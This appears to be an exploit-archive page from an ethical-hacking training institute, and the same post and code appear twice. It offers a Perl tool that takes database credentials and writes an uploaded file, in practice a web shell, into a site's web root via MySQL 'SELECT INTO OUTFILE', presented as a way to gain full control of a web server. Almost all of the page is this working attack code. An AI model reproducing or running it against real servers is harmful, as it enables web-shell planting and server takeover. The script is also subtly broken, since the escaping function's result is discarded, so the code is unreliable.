| Filename | Phpmyadmin Shell Upload Program in perl |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 1/23/2014 |
| Label | Penetration |
| Action |
Ethical Hacking Institute in Pune
./Arizona Team
While going through are CEH labs, one of our student as that what if he got access to a phpmyadmin portal, is it possible to root the server or upload a shell so that he gets a access of the full web server? And my answer was big yeesss..
So here is the process alogo code written in perl that will help in getting the root of web server. Go through the code understand the logical flow and create a new one for yourself. If you find any difficulty in understanding the logical flow shoot your query to instructor@arizonainfotech.com.
Code:
#!/usr/bin/perl
use strict;
use warnings;
use DBI;
use DBD::mysql;
use IO::File;
use Term::ANSIColor qw(:constants);
sub main(){
print BOLD BLUE,"\n[*]",RESET," Phpmyadmin shell upload by Team Arizona";
print "\n\n\n";
print BOLD BLUE,"[*]",RESET," Host: ";
chomp(my $host = <stdin>);
print BOLD BLUE,"[*]",RESET," User: ";
chomp(my $user = <stdin>);
print BOLD BLUE,"[*]",RESET," Password: ";
chomp(my $pass = <stdin>);
print BOLD BLUE,"[*]",RESET," File of text , which will be uploaded to host : ";
chomp(my $arq = <stdin>);
print BOLD BLUE,"[*]",RESET," Path of site+Name of the final file: ";
chomp(my $path = <stdin>);
my $dsn = "dbi:mysql::$host:3306";
my $dbh = DBI->connect($dsn, $user, $pass,{
PrintError => 0,
RaiseError => 0
});
if(!$dbh) { die(BOLD RED,"\n[-]",RESET," Connection error\n\n"); }
my $f = new IO::File;
$f->open("<$arq") or die $!;
my @file = <$f>;
chomp(@file);
my $text = join('',@file);
chomp($text);
&AddSlashes($text);
$f->close;
my $sth = $dbh->prepare('SELECT "' . $text . '" INTO OUTFILE "'.$path.'"');
if(!$sth->execute()){
print BOLD RED "\n[-]",RESET," Failed to make file\n\n";
exit;
} else {
print GREEN "\n[+]",RESET," File are create !!!\n\n";
exit;
}
}
sub AddSlashes()
{
my $text = shift;
$text =~ s/\\/\\\\/g;
$text =~ s/'/\\'/g;
$text =~ s/"/\\"/g;
$text =~ s/\\0/\\\\0/g;
return $text;
}
&main();
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
./Arizona Team
While going through are CEH labs, one of our student as that what if he got access to a phpmyadmin portal, is it possible to root the server or upload a shell so that he gets a access of the full web server? And my answer was big yeesss..
So here is the process alogo code written in perl that will help in getting the root of web server. Go through the code understand the logical flow and create a new one for yourself. If you find any difficulty in understanding the logical flow shoot your query to instructor@arizonainfotech.com.
Code:
#!/usr/bin/perl
use strict;
use warnings;
use DBI;
use DBD::mysql;
use IO::File;
use Term::ANSIColor qw(:constants);
sub main(){
print BOLD BLUE,"\n[*]",RESET," Phpmyadmin shell upload by Team Arizona";
print "\n\n\n";
print BOLD BLUE,"[*]",RESET," Host: ";
chomp(my $host = <stdin>);
print BOLD BLUE,"[*]",RESET," User: ";
chomp(my $user = <stdin>);
print BOLD BLUE,"[*]",RESET," Password: ";
chomp(my $pass = <stdin>);
print BOLD BLUE,"[*]",RESET," File of text , which will be uploaded to host : ";
chomp(my $arq = <stdin>);
print BOLD BLUE,"[*]",RESET," Path of site+Name of the final file: ";
chomp(my $path = <stdin>);
my $dsn = "dbi:mysql::$host:3306";
my $dbh = DBI->connect($dsn, $user, $pass,{
PrintError => 0,
RaiseError => 0
});
if(!$dbh) { die(BOLD RED,"\n[-]",RESET," Connection error\n\n"); }
my $f = new IO::File;
$f->open("<$arq") or die $!;
my @file = <$f>;
chomp(@file);
my $text = join('',@file);
chomp($text);
&AddSlashes($text);
$f->close;
my $sth = $dbh->prepare('SELECT "' . $text . '" INTO OUTFILE "'.$path.'"');
if(!$sth->execute()){
print BOLD RED "\n[-]",RESET," Failed to make file\n\n";
exit;
} else {
print GREEN "\n[+]",RESET," File are create !!!\n\n";
exit;
}
}
sub AddSlashes()
{
my $text = shift;
$text =~ s/\\/\\\\/g;
$text =~ s/'/\\'/g;
$text =~ s/"/\\"/g;
$text =~ s/\\0/\\\\0/g;
return $text;
}
&main();
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune